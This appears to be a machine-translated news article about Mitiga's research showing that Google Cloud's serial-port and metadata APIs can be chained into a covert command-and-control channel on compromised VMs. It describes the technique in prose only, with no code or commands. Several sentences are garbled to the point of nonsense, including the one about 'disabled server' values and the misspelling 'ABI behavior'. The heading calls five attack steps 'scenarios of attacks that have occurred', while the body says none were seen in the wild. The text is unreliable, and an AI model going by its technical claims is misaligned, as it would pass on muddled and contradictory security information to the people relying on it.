Misconfiguration of the Google Cloud Platform API could create exploitable behavior leading to service compromise. Ensuring the integrity of credential storage and enforcing a strict Google Cloud account management policy is essential.
Strange and dangerous behavior within Google Cloud Platform (GCP) was revealed on Thursday by cloud security firm Mitiga. If GCP is not configured correctly, it could be exploited by attackers to engage in malicious activity in a user’s cloud environment, according to a blog post on the Israeli company’s website.
The behavior is tied to one of the APIs used by Google Cloud. The API allows users to retrieve data from serial ports. Only here, by allowing a virtual machine in the cloud, data could also be written continuously on the ports. Also, because of how Google Cloud categorizes this traffic, administrators don’t have much visibility into it. If an attacker exploited this behavior, his constant calls to ports could give him a hint, Mitiga says, but the malicious activity is likely to be missed by developers unfamiliar with the specifics of the attack. APIs.
Attackers can get command and control abilities
Another quirk of Google Cloud, noticed by Mitiga, is the way it allows users to change required features at runtime. Other cloud providers also give users this power, but only when a virtual machine is shut down. Google’s virtual machines allow users to set enabled custom tags with custom values and, by default, read those values from a disabled server. Coupled with the serial port read function, Mitiga said a full feedback loop is created that can give attackers command and control capabilities.
The company also illustrated a comment of software unable to use the API for full administrative to a system. By using a command to configure a virtual machine to use user data when the VM starts, attackers can write a script to load at runtime and take control of a system.
5 scenarios of attacks that have occurred
Mitiga presented five attack scenarios stemming from his findings. In the first, an attacker can access Google Cloud credentials with the appropriate API permissions for setMetadata and getSerialPortOutput on one or more VMs. In the second scenario, using traditional network-based lateral movement methods, the attacker can install malware on the system that communicates using the cloud API.
A third possibility is that the attacker can send commands to the victim machine by inserting them into the disabled custom ones using a detected key. A fourth scenario was this: the victim system can continuously read the key looking for commands and when it finds one, the command is executed and the output is sent to a known serial port. Finally, the last scenario is the following: the adversary is still reading the serial port and waiting to receive the output of the command.
A Secret Way to Preserve Access to Compromised Systems
Andrew Johnston, Mitiga’s principal consultant who wrote the blog, downplayed the threat that risky API behavior poses to organizations. “As long as you follow all the other security guidelines — credentials are working properly, accounts only have the permissions they need — there’s no real threat here,” he says. “The problem is that these things are easier said than done. If an attacker instant access to a Google Cloud account with the appropriate permissions, he could use this attack vector to gain access to the systems”. “The impact of this situation is that it is a covert way to maintain access to a compromised system,” adds Andrew Johnston. “It’s not something that would set off alarm bells in a standard SOC environment.”
Although Mitiga did not find the ABI behavior used in the wild, the consultant explains that it is important to pass the information to the Google Cloud community. “High-level attackers are well aware of a number of attack vectors that aren’t available to the general public,” he says. “The best way to disarm such groups is to identify these techniques and publicize them, because when organizations are aware, they can improve their preparedness for breaches.”